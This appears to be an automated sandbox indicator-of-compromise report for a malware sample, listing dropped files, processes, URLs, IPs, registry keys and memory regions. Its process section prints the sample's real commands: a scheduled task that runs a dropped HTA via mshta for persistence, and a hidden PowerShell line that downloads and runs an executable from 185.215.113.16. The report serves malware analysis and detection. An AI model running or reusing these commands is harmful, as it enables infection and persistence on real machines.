IOC Report
IGUZ6ZXJA4.exe

FilesProcessesURLsIPsRegistryMemdumps1210864201,00010010Label

Files

File Path
Type
Category
Malicious
Download
IGUZ6ZXJA4.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\TempL5OXKHBHLR55YGAHEGJLRFZIHH3ZTLGU.EXE
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\w0UrtdHVs.hta
HTML document, ASCII text, with very long lines (541), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cyf5rxu.own.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvkqktev.yff.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrvt4dfp.inu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvzh25f1.kw4.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Tasks\skotes.job
data
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\IGUZ6ZXJA4.exe
"C:\Users\user\Desktop\IGUZ6ZXJA4.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn fsrtjmauHZq /tr "mshta C:\Users\user\AppData\Local\Temp\w0UrtdHVs.hta" /sc minute /mo 25 /ru "user" /f
malicious
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\user\AppData\Local\Temp\w0UrtdHVs.hta
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn fsrtjmauHZq /tr "mshta C:\Users\user\AppData\Local\Temp\w0UrtdHVs.hta" /sc minute /mo 25 /ru "user" /f
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L5OXKHBHLR55YGAHEGJLRFZIHH3ZTLGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
malicious
C:\Windows\System32\mshta.exe
C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\w0UrtdHVs.hta
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L5OXKHBHLR55YGAHEGJLRFZIHH3ZTLGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
malicious
C:\Users\user\AppData\Local\TempL5OXKHBHLR55YGAHEGJLRFZIHH3ZTLGU.EXE
"C:\Users\user\AppData\Local\TempL5OXKHBHLR55YGAHEGJLRFZIHH3ZTLGU.EXE"
malicious
C:\Users\user\AppData\Local\TempL5OXKHBHLR55YGAHEGJLRFZIHH3ZTLGU.EXE
"C:\Users\user\AppData\Local\TempL5OXKHBHLR55YGAHEGJLRFZIHH3ZTLGU.EXE"
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.215.113.43/Zu7JuNko/index.phpT#
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://185.215.113.43/Zu7JuNko/index.php)#
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://185.215.113.16/mine/random.exe
185.215.113.16
http://185.215.113.16
unknown
http://185.215.113.43/Zu7JuNko/index.phpJ
unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded
unknown
http://185.215.113.43/8
unknown
http://185.215.113.43/Zu7JuNko/index.php:#u
unknown
https://github.com/Pester/Pester
unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded1
unknown
http://185.215.113.43/Zu7JuNko/index.php
185.215.113.43
http://185.215.113.43/Zu7JuNko/index.phpv#
unknown
http://185.215.113.43/Zu7JuNko/index.php9
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://185.215.113.43/Zu7JuNko/index.phpded
unknown
http://185.215.113.43/Zu7JuNko/index.phpcoded
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 16 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
185.215.113.43
unknown
Portugal
malicious
185.215.113.16
unknown
Portugal
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
ED1000
unkown
page execute and read and write
malicious
7B1000
unkown
page execute and read and write
malicious
ED1000
unkown
page execute and read and write
malicious
7B1000
unkown
page execute and read and write
malicious
7B1000
unkown
page execute and read and write
malicious
4A4F000
stack
page read and write
DD0000
heap
page read and write
15D02FB7000
heap
page execute and read and write
52EB000
stack
page read and write
68E1000
heap
page read and write
4B21000
heap
page read and write
CA0000
heap
page read and write
4AE28F6000
stack
page read and write
2637000
heap
page read and write
4B21000
heap
page read and write
109E000
heap
page read and write
46BF000
stack
page read and write
15A0DF53000
heap
page read and write
C74000
unkown
page execute and read and write
4B21000
heap
page read and write
11DA000
unkown
page execute and read and write
340C000
stack
page read and write
2D4E000
stack
page read and write
51E0000
direct allocation
page execute and read and write
1147000
heap
page read and write
51E1000
heap
page read and write
1C2F000
stack
page read and write
51E1000
heap
page read and write
D68000
heap
page read and write
4B21000
heap
page read and write
4B21000
heap
page read and write
4B40000
heap
page read and write
8F5C000
stack
page read and write
8455000
heap
page read and write
741A000
heap
page read and write
5210000
direct allocation
page execute and read and write
106E000
heap
page read and write
51E1000
heap
page read and write
4B21000
heap
page read and write
437E000
stack
page read and write
4B10000
direct allocation
page execute and read and write
162101A0000
heap
page read and write
68F1000
heap
page read and write
15D13041000
trusted library allocation
page read and write
51D0000
direct allocation
page read and write
51E1000
heap
page read and write
3B7F000
stack
page read and write
57FF000
stack
page read and write
812000
unkown
page execute and write copy
4480000
heap
page read and write
7FFD99D30000
trusted library allocation
page execute and read and write
7563000
heap
page read and write
51E1000
heap
page read and write
36E4000
heap
page read and write
7B1000
unkown
page execute and write copy
3074000
trusted library allocation
page read and write
7DF4270F0000
trusted library allocation
page execute and read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
15A0DF29000
heap
page read and write
51E1000
heap
page read and write
10D4000
heap
page read and write
547C2FC000
stack
page read and write
1086000
heap
page read and write
4B21000
heap
page read and write
15D02B00000
trusted library allocation
page read and write
15A0DF0E000
heap
page read and write
F60000
heap
page read and write
162101B4000
heap
page read and write
4B21000
heap
page read and write
3080000
trusted library allocation
page read and write
3C0F000
stack
page read and write
5140000
direct allocation
page execute and read and write
4E7F000
stack
page read and write
15D1B206000
heap
page read and write
378F000
stack
page read and write
338E000
stack
page read and write
1620FED3000
trusted library allocation
page read and write
D38000
heap
page read and write
699000
stack
page read and write
5820000
direct allocation
page execute and read and write
36E8000
heap
page read and write
4B21000
heap
page read and write
4B20000
direct allocation
page execute and read and write
2E00000
direct allocation
page read and write
2E00000
direct allocation
page read and write
703D000
stack
page read and write
1540000
direct allocation
page read and write
321F000
stack
page read and write
73F7000
heap
page read and write
4B1F000
stack
page read and write
2FB7000
heap
page read and write
F39000
unkown
page write copy
51E1000
heap
page read and write
307F000
stack
page read and write
51E1000
heap
page read and write
7800000
trusted library allocation
page read and write
7F0C0000
trusted library allocation
page execute and read and write
9AB000
unkown
page execute and read and write
37BF000
stack
page read and write
45BE000
stack
page read and write
5840000
direct allocation
page execute and read and write
2D3E000
stack
page read and write
15A0DF37000
heap
page read and write
7770000
trusted library allocation
page read and write
59C000
unkown
page readonly
479E000
stack
page read and write
288F000
stack
page read and write
90C000
stack
page read and write
34CE000
stack
page read and write
9EE000
stack
page read and write
383A000
heap
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
3ABE000
stack
page read and write
F32000
unkown
page execute and read and write
3DCF000
stack
page read and write
5800000
direct allocation
page execute and read and write
15A0DF53000
heap
page read and write
54EF000
trusted library allocation
page read and write
1B2E000
stack
page read and write
15A0DF29000
heap
page read and write
E6E000
stack
page read and write
3ACF000
stack
page read and write
5EE000
stack
page read and write
1736000
heap
page read and write
5260000
direct allocation
page execute and read and write
15A0F9B0000
heap
page read and write
494E000
stack
page read and write
4BF1000
heap
page read and write
51C0000
direct allocation
page execute and read and write
2770000
direct allocation
page read and write
374E000
stack
page read and write
360E000
stack
page read and write
ABA000
unkown
page execute and read and write
19FB000
heap
page read and write
4AB0000
direct allocation
page execute and read and write
483E000
stack
page read and write
19B2000
heap
page read and write
333E000
stack
page read and write
AD1000
unkown
page execute and read and write
51E1000
heap
page read and write
7FFD99C13000
trusted library allocation
page execute and read and write
594D000
stack
page read and write
11E7000
heap
page read and write
716B000
stack
page read and write
49CE000
stack
page read and write
7FFD99F50000
trusted library allocation
page read and write
5037000
trusted library allocation
page read and write
349F000
stack
page read and write
4B21000
heap
page read and write
4B21000
heap
page read and write
428E000
stack
page read and write
ED0000
unkown
page read and write
39DE000
stack
page read and write
4BBF000
stack
page read and write
5870000
direct allocation
page execute and read and write
5140000
direct allocation
page execute and read and write
1182000
heap
page read and write
7810000
trusted library allocation
page read and write
812000
unkown
page execute and write copy
51E1000
heap
page read and write
7144000
heap
page read and write
700E000
heap
page read and write
46CE000
stack
page read and write
2E00000
direct allocation
page read and write
40FE000
stack
page read and write
51E1000
heap
page read and write
68EC000
heap
page read and write
3475000
heap
page read and write
82F0000
heap
page read and write
10E3000
heap
page read and write
740C000
heap
page read and write
4980000
direct allocation
page read and write
73B0000
heap
page read and write
3480000
heap
page read and write
19A9000
heap
page read and write
51E1000
heap
page read and write
3400000
heap
page read and write
3B8E000
stack
page read and write
2620000
direct allocation
page read and write
56BE000
stack
page read and write
393E000
stack
page read and write
5800000
direct allocation
page execute and read and write
6F1E000
stack
page read and write
812000
unkown
page execute and read and write
57D0000
direct allocation
page execute and read and write
10DD000
heap
page read and write
7FFD99F00000
trusted library allocation
page read and write
D0E000
stack
page read and write
51E1000
heap
page read and write
6D6E000
stack
page read and write
77F0000
trusted library allocation
page read and write
51E1000
heap
page read and write
307D000
trusted library allocation
page execute and read and write
51E1000
heap
page read and write
389E000
stack
page read and write
480E000
stack
page read and write
77E000
stack
page read and write
19D1000
heap
page read and write
2770000
direct allocation
page read and write
5670000
direct allocation
page read and write
1147000
heap
page read and write
383E000
stack
page read and write
15A0DF53000
heap
page read and write
43DE000
stack
page read and write
3A0F000
stack
page read and write
11BD000
heap
page read and write
51E1000
heap
page read and write
10CD000
heap
page read and write
745E000
heap
page read and write
51E1000
heap
page read and write
6D2F000
stack
page read and write
4B90000
direct allocation
page execute and read and write
2DFE000
stack
page read and write
15D0326D000
trusted library allocation
page read and write
458E000
stack
page read and write
5FA0000
heap
page read and write
3770000
trusted library allocation
page read and write
5150000
direct allocation
page execute and read and write
4B21000
heap
page read and write
162101B3000
heap
page read and write
4B40000
direct allocation
page execute and read and write
4B21000
heap
page read and write
7B0000
unkown
page read and write
10E7000
heap
page read and write
7B1000
unkown
page execute and write copy
7FFD99E90000
trusted library allocation
page read and write
A8E000
unkown
page execute and read and write
162102A5000
trusted library allocation
page read and write
109E000
heap
page read and write
51E1000
heap
page read and write
1178000
heap
page read and write
1540000
direct allocation
page read and write
7FFD99CC0000
trusted library allocation
page read and write
1147000
heap
page read and write
33FE000
stack
page read and write
6BC0000
heap
page read and write
3BBE000
stack
page read and write
15A0DE9E000
heap
page read and write
5283000
trusted library allocation
page read and write
5800000
direct allocation
page execute and read and write
39CE000
stack
page read and write
414E000
stack
page read and write
375E000
stack
page read and write
7B0000
unkown
page readonly
1194000
heap
page read and write
4B21000
heap
page read and write
430E000
stack
page read and write
51E1000
heap
page read and write
4F8E000
stack
page read and write
51E1000
heap
page read and write
5CC000
unkown
page read and write
2ACE000
stack
page read and write
15D1B184000
heap
page read and write
51E1000
heap
page read and write
6030000
trusted library allocation
page read and write
8DBE000
stack
page read and write
2620000
direct allocation
page read and write
301F000
stack
page read and write
35DF000
stack
page read and write
4ACF000
stack
page read and write
444E000
stack
page read and write
4E4E000
stack
page read and write
7468000
heap
page read and write
2770000
direct allocation
page read and write
1540000
direct allocation
page read and write
15A0DF0E000
heap
page read and write
15D02FB0000
heap
page execute and read and write
14DF000
stack
page read and write
15D03041000
trusted library allocation
page read and write
344E000
stack
page read and write
4960000
heap
page read and write
1620FED1000
trusted library allocation
page read and write
83D0000
heap
page read and write
4AB0000
direct allocation
page execute and read and write
4B10000
direct allocation
page execute and read and write
30A0000
trusted library allocation
page read and write
13DB000
stack
page read and write
7FFD99DD0000
trusted library allocation
page execute and read and write
772D000
stack
page read and write
51E1000
heap
page read and write
87AE000
stack
page read and write
2780000
heap
page read and write
11D4000
heap
page read and write
7FFD99DC5000
trusted library allocation
page read and write
15A0F970000
trusted library allocation
page read and write
4918000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
7FFD99F40000
trusted library allocation
page read and write
15A0DEED000
heap
page read and write
15A0DF39000
heap
page read and write
51E1000
heap
page read and write
5240000
direct allocation
page execute and read and write
EE0000
heap
page read and write
4B21000
heap
page read and write
51E1000
heap
page read and write
1133000
heap
page read and write
51E1000
heap
page read and write
700000
heap
page read and write
77A0000
trusted library allocation
page read and write
108E000
heap
page read and write
41FE000
stack
page read and write
727B000
stack
page read and write
2C0E000
stack
page read and write
51E1000
heap
page read and write
13DE000
stack
page read and write
7FFD99CC6000
trusted library allocation
page read and write
2770000
direct allocation
page read and write
51E1000
heap
page read and write
3E8F000
stack
page read and write
81B000
unkown
page execute and read and write
15D02FC0000
heap
page execute and read and write
368F000
stack
page read and write
36E8000
heap
page read and write
120C000
heap
page read and write
2770000
direct allocation
page read and write
4AE2EFE000
stack
page read and write
790000
heap
page read and write
76E000
stack
page read and write
30BE000
stack
page read and write
4920000
direct allocation
page read and write
3A3F000
stack
page read and write
4930000
trusted library allocation
page execute and read and write
15D01190000
heap
page read and write
51E1000
heap
page read and write
44D0000
heap
page read and write
3460000
heap
page read and write
4B21000
heap
page read and write
51E1000
heap
page read and write
3D4F000
stack
page read and write
570000
heap
page read and write
7FFD99C30000
trusted library allocation
page read and write
5210000
direct allocation
page execute and read and write
4D8E000
stack
page read and write
6A90000
trusted library allocation
page read and write
261E000
stack
page read and write
501000
unkown
page execute read
3CCE000
stack
page read and write
48C0000
heap
page read and write
10E5000
heap
page read and write
4B21000
heap
page read and write
5210000
direct allocation
page execute and read and write
4B21000
heap
page read and write
2CFE000
stack
page read and write
47FF000
stack
page read and write
1133000
heap
page read and write
404F000
stack
page read and write
454F000
stack
page read and write
2A8F000
stack
page read and write
580000
heap
page read and write
36AA000
heap
page read and write
5890000
direct allocation
page execute and read and write
4FB0000
direct allocation
page read and write
2620000
direct allocation
page read and write
1125000
heap
page read and write
2F3F000
stack
page read and write
1550000
heap
page read and write
51E1000
heap
page read and write
500000
unkown
page readonly
4B21000
heap
page read and write
15A0DECC000
heap
page read and write
36AF000
heap
page read and write
1AC000
stack
page read and write
71AE000
stack
page read and write
1071000
heap
page read and write
1071000
heap
page read and write
15A0DEED000
heap
page read and write
5290000
direct allocation
page execute and read and write
38FF000
stack
page read and write
547C37E000
stack
page read and write
6BE0000
heap
page read and write
5170000
direct allocation
page execute and read and write
3070000
trusted library allocation
page read and write
339E000
stack
page read and write
4B21000
heap
page read and write
36A1000
heap
page read and write
51D0000
direct allocation
page read and write
57E000
heap
page read and write
51E1000
heap
page read and write
1A1B000
heap
page read and write
15D1B2E0000
heap
page read and write
542F000
heap
page read and write
4B8F000
stack
page read and write
10EC000
heap
page read and write
16210300000
trusted library allocation
page execute
2E00000
direct allocation
page read and write
11E7000
heap
page read and write
7760000
trusted library allocation
page read and write
10FC000
heap
page read and write
2770000
direct allocation
page read and write
7FFD99F20000
trusted library allocation
page read and write
547C47E000
stack
page read and write
49C7000
heap
page read and write
55AE000
stack
page read and write
48D0000
trusted library allocation
page read and write
51E1000
heap
page read and write
50CE000
stack
page read and write
2787000
heap
page read and write
15D02EF3000
trusted library allocation
page read and write
819000
unkown
page read and write
11F1000
unkown
page execute and write copy
36C8000
heap
page read and write
3CFE000
stack
page read and write
4B21000
heap
page read and write
36FD000
heap
page read and write
4B21000
heap
page read and write
DCF000
stack
page read and write
2FAE000
stack
page read and write
11F1000
unkown
page execute and read and write
ABA000
unkown
page execute and read and write
19B3000
heap
page read and write
6BE6000
heap
page read and write
2620000
direct allocation
page read and write
15D1B1A1000
heap
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
547BBCE000
stack
page read and write
2F8F000
stack
page read and write
31BF000
stack
page read and write
19E6000
heap
page read and write
15D01300000
heap
page read and write
4B21000
heap
page read and write
44F1000
heap
page read and write
4AE29FE000
stack
page read and write
11C8000
heap
page read and write
51E1000
heap
page read and write
461F000
stack
page read and write
11F5000
heap
page read and write
10CD000
heap
page read and write
5830000
direct allocation
page execute and read and write
1620FF04000
heap
page read and write
4E3E000
stack
page read and write
74C1000
heap
page read and write
497E000
stack
page read and write
51E1000
heap
page read and write
15A0DECC000
heap
page read and write
30E0000
heap
page read and write
3A7F000
stack
page read and write
36D3000
heap
page read and write
1229000
heap
page read and write
15D1B169000
heap
page read and write
399F000
stack
page read and write
2DBE000
stack
page read and write
48DE000
stack
page read and write
51E1000
heap
page read and write
15D1B430000
heap
page read and write
16FA000
stack
page read and write
7FFD99F70000
trusted library allocation
page read and write
41FF000
stack
page read and write
9AB000
unkown
page execute and read and write
119C000
heap
page read and write
4B21000
heap
page read and write
10D2000
heap
page read and write
36C8000
heap
page read and write
44F1000
heap
page read and write
3E3E000
stack
page read and write
1182000
heap
page read and write
819000
unkown
page read and write
7370000
trusted library allocation
page read and write
11F1000
heap
page read and write
11BD000
heap
page read and write
9DC000
stack
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
4B50000
direct allocation
page execute and read and write
5080000
direct allocation
page read and write
19F9000
heap
page read and write
37CE000
stack
page read and write
527D000
trusted library allocation
page read and write
19F4000
heap
page read and write
36E8000
heap
page read and write
15A0F850000
heap
page read and write
1136000
heap
page read and write
87EE000
stack
page read and write
3830000
heap
page read and write
1181000
heap
page read and write
2BBE000
stack
page read and write
43C000
stack
page read and write
15A0DF37000
heap
page read and write
438F000
stack
page read and write
4ABE000
stack
page read and write
D0C000
stack
page read and write
C74000
unkown
page execute and read and write
4EBD000
stack
page read and write
193E000
heap
page read and write
5A8E000
stack
page read and write
37FF000
stack
page read and write
15A0DE90000
heap
page read and write
51E1000
heap
page read and write
3F0F000
stack
page read and write
364E000
stack
page read and write
44F1000
heap
page read and write
51E1000
heap
page read and write
1740000
heap
page read and write
162101AA000
heap
page read and write
335F000
stack
page read and write
5420000
heap
page read and write
468F000
stack
page read and write
ED1000
unkown
page execute and write copy
5D4000
unkown
page readonly
3060000
trusted library allocation
page read and write
36FE000
stack
page read and write
3E7E000
stack
page read and write
15D02EF0000
trusted library allocation
page read and write
4B21000
heap
page read and write
2EEF000
stack
page read and write
812000
unkown
page execute and read and write
44DF000
stack
page read and write
3C8F000
stack
page read and write
7FFD99F10000
trusted library allocation
page read and write
15D1B424000
heap
page read and write
447F000
stack
page read and write
19CD000
heap
page read and write
5850000
direct allocation
page execute and read and write
4AA0000
direct allocation
page execute and read and write
3CFF000
stack
page read and write
5120000
direct allocation
page execute and read and write
7390000
heap
page execute and read and write
985000
heap
page read and write
15D0479B000
trusted library allocation
page read and write
53D000
stack
page read and write
4B21000
heap
page read and write
4B21000
heap
page read and write
51E1000
heap
page read and write
2E00000
direct allocation
page read and write
1A1B000
heap
page read and write
388E000
stack
page read and write
737C000
stack
page read and write
5280000
direct allocation
page execute and read and write
7FFD99E20000
trusted library allocation
page read and write
D5C000
heap
page read and write
51E1000
heap
page read and write
547BE7E000
stack
page read and write
E7D000
stack
page read and write
7FFD99EA0000
trusted library allocation
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
11C0000
heap
page read and write
51E1000
heap
page read and write
11F2000
unkown
page execute and write copy
51E1000
heap
page read and write
15A0DF40000
heap
page read and write
119B000
heap
page read and write
4B21000
heap
page read and write
DEF000
stack
page read and write
37F7000
heap
page read and write
2E00000
direct allocation
page read and write
77D0000
trusted library allocation
page read and write
51E1000
heap
page read and write
DDB000
stack
page read and write
4A80000
direct allocation
page execute and read and write
30CF000
stack
page read and write
F3B000
unkown
page execute and read and write
4481000
heap
page read and write
731E000
stack
page read and write
4CE0000
heap
page read and write
1620FED9000
trusted library allocation
page read and write
4AE2AFE000
stack
page read and write
51F1000
heap
page read and write
5670000
direct allocation
page read and write
2E00000
direct allocation
page read and write
1620FE40000
heap
page read and write
11AE000
unkown
page execute and read and write
51E1000
heap
page read and write
15D1B16B000
heap
page read and write
162101B3000
heap
page read and write
10DF000
heap
page read and write
2D0F000
stack
page read and write
4B21000
heap
page read and write
2620000
direct allocation
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
15A0DF53000
heap
page read and write
109E000
heap
page read and write
1203000
heap
page read and write
51E1000
heap
page read and write
10AC000
heap
page read and write
5080000
direct allocation
page read and write
5EE9000
trusted library allocation
page read and write
397E000
stack
page read and write
3450000
heap
page read and write
36FD000
heap
page read and write
4B21000
heap
page read and write
7FFD99CCC000
trusted library allocation
page execute and read and write
4B21000
heap
page read and write
5080000
direct allocation
page read and write
2E8E000
stack
page read and write
1182000
heap
page read and write
1A13000
heap
page read and write
162105B0000
heap
page read and write
500000
unkown
page readonly
3FCF000
stack
page read and write
5030000
trusted library allocation
page read and write
429E000
stack
page read and write
4EE1000
trusted library allocation
page read and write
70AD000
stack
page read and write
F39000
unkown
page read and write
32BF000
stack
page read and write
7B0000
unkown
page read and write
3FDF000
stack
page read and write
51E1000
heap
page read and write
114E000
heap
page read and write
11A7000
heap
page read and write
F39000
unkown
page read and write
11E9000
heap
page read and write
1540000
direct allocation
page read and write
49C9000
heap
page read and write
19E6000
heap
page read and write
7001000
heap
page read and write
4F60000
trusted library allocation
page read and write
598D000
stack
page read and write
4B21000
heap
page read and write
1187000
heap
page read and write
69E3000
trusted library allocation
page read and write
273F000
stack
page read and write
15A0F867000
heap
page read and write
1082000
heap
page read and write
15A0DF53000
heap
page read and write
7FFD99C2B000
trusted library allocation
page read and write
31BF000
stack
page read and write
15A0DF03000
heap
page read and write
530000
heap
page read and write
1081000
heap
page read and write
4B21000
heap
page read and write
7FFD99DF2000
trusted library allocation
page read and write
EA0000
heap
page read and write
51A0000
direct allocation
page execute and read and write
401E000
stack
page read and write
75B0000
trusted library allocation
page read and write
81B000
unkown
page execute and read and write
36D3000
heap
page read and write
4B30000
direct allocation
page execute and read and write
2F1F000
stack
page read and write
3E0E000
stack
page read and write
15A0F9F0000
heap
page read and write
819000
unkown
page write copy
2F7E000
stack
page read and write
30D0000
heap
page readonly
4BE1000
heap
page read and write
19EF000
heap
page read and write
18CE000
stack
page read and write
7E0000
heap
page read and write
11E1000
unkown
page execute and read and write
5426000
heap
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
15A0DF29000
heap
page read and write
370F000
stack
page read and write
15D01201000
heap
page read and write
4B10000
direct allocation
page execute and read and write
F32000
unkown
page execute and write copy
343F000
stack
page read and write
547C177000
stack
page read and write
4FFC000
stack
page read and write
15D1B150000
heap
page read and write
11CD000
heap
page read and write
4A90000
direct allocation
page execute and read and write
2E00000
direct allocation
page read and write
361E000
stack
page read and write
4D4D000
stack
page read and write
51E1000
heap
page read and write
547CFCB000
stack
page read and write
2620000
direct allocation
page read and write
1820000
heap
page read and write
1620FEF0000
heap
page readonly
1540000
direct allocation
page read and write
2620000
direct allocation
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
4BA0000
direct allocation
page execute and read and write
36AF000
heap
page read and write
2770000
direct allocation
page read and write
1080000
heap
page read and write
15A0DF0E000
heap
page read and write
15A0DF53000
heap
page read and write
155F000
stack
page read and write
1082000
heap
page read and write
15A0DF19000
heap
page read and write
36D3000
heap
page read and write
1620FED5000
trusted library allocation
page read and write
11FE000
heap
page read and write
51E1000
heap
page read and write
433E000
stack
page read and write
1216000
heap
page read and write
121E000
heap
page read and write
358F000
stack
page read and write
D80000
heap
page read and write
4B21000
heap
page read and write
32FE000
stack
page read and write
7FFD99DB0000
trusted library allocation
page read and write
AD1000
unkown
page execute and write copy
7560000
heap
page read and write
118E000
heap
page read and write
19F0000
heap
page read and write
36E4000
heap
page read and write
15A0DE98000
heap
page read and write
51D0000
direct allocation
page read and write
4CCF000
stack
page read and write
11FE000
heap
page read and write
51E1000
heap
page read and write
4BE0000
heap
page read and write
1396000
unkown
page execute and write copy
439F000
stack
page read and write
7FFD99E60000
trusted library allocation
page read and write
748C000
stack
page read and write
11A0000
heap
page read and write
51E1000
heap
page read and write
15D011D8000
heap
page read and write
51E1000
heap
page read and write
184E000
stack
page read and write
D60000
heap
page read and write
116F000
heap
page read and write
15D03C6D000
trusted library allocation
page read and write
2E00000
direct allocation
page read and write
743B000
heap
page read and write
4B60000
direct allocation
page execute and read and write
C74000
unkown
page execute and read and write
C3D000
stack
page read and write
1A11000
heap
page read and write
15A0DF13000
heap
page read and write
1073000
heap
page read and write
51E1000
heap
page read and write
15D1B45F000
heap
page read and write
3BFE000
stack
page read and write
457F000
stack
page read and write
6C2E000
stack
page read and write
2770000
direct allocation
page read and write
36E2000
heap
page read and write
ED0000
unkown
page read and write
10D9000
heap
page read and write
547C1F6000
stack
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
9AB000
unkown
page execute and read and write
15A0DEDD000
heap
page read and write
7FFD99C14000
trusted library allocation
page read and write
3CBF000
stack
page read and write
51E1000
heap
page read and write
390E000
stack
page read and write
10FB000
heap
page read and write
51E1000
heap
page read and write
15D02B70000
heap
page read and write
D30000
heap
page read and write
1540000
direct allocation
page read and write
30E9000
heap
page read and write
F32000
unkown
page execute and write copy
5210000
direct allocation
page execute and read and write
50FF000
stack
page read and write
7FFD99F30000
trusted library allocation
page read and write
6D10000
heap
page read and write
1058000
heap
page read and write
6C10000
trusted library allocation
page execute
7451000
heap
page read and write
7FFD99DE0000
trusted library allocation
page execute and read and write
51E1000
heap
page read and write
15A0F9FD000
heap
page read and write
7FFD99EC0000
trusted library allocation
page read and write
2E00000
direct allocation
page read and write
4A7F000
stack
page read and write
7600000
trusted library allocation
page read and write
51E1000
heap
page read and write
C38000
stack
page read and write
51F0000
direct allocation
page execute and read and write
11D6000
heap
page read and write
44F1000
heap
page read and write
2770000
direct allocation
page read and write
15A0DF23000
heap
page read and write
15A0DF3E000
heap
page read and write
11DA000
unkown
page execute and read and write
4AE0000
direct allocation
page execute and read and write
36C8000
heap
page read and write
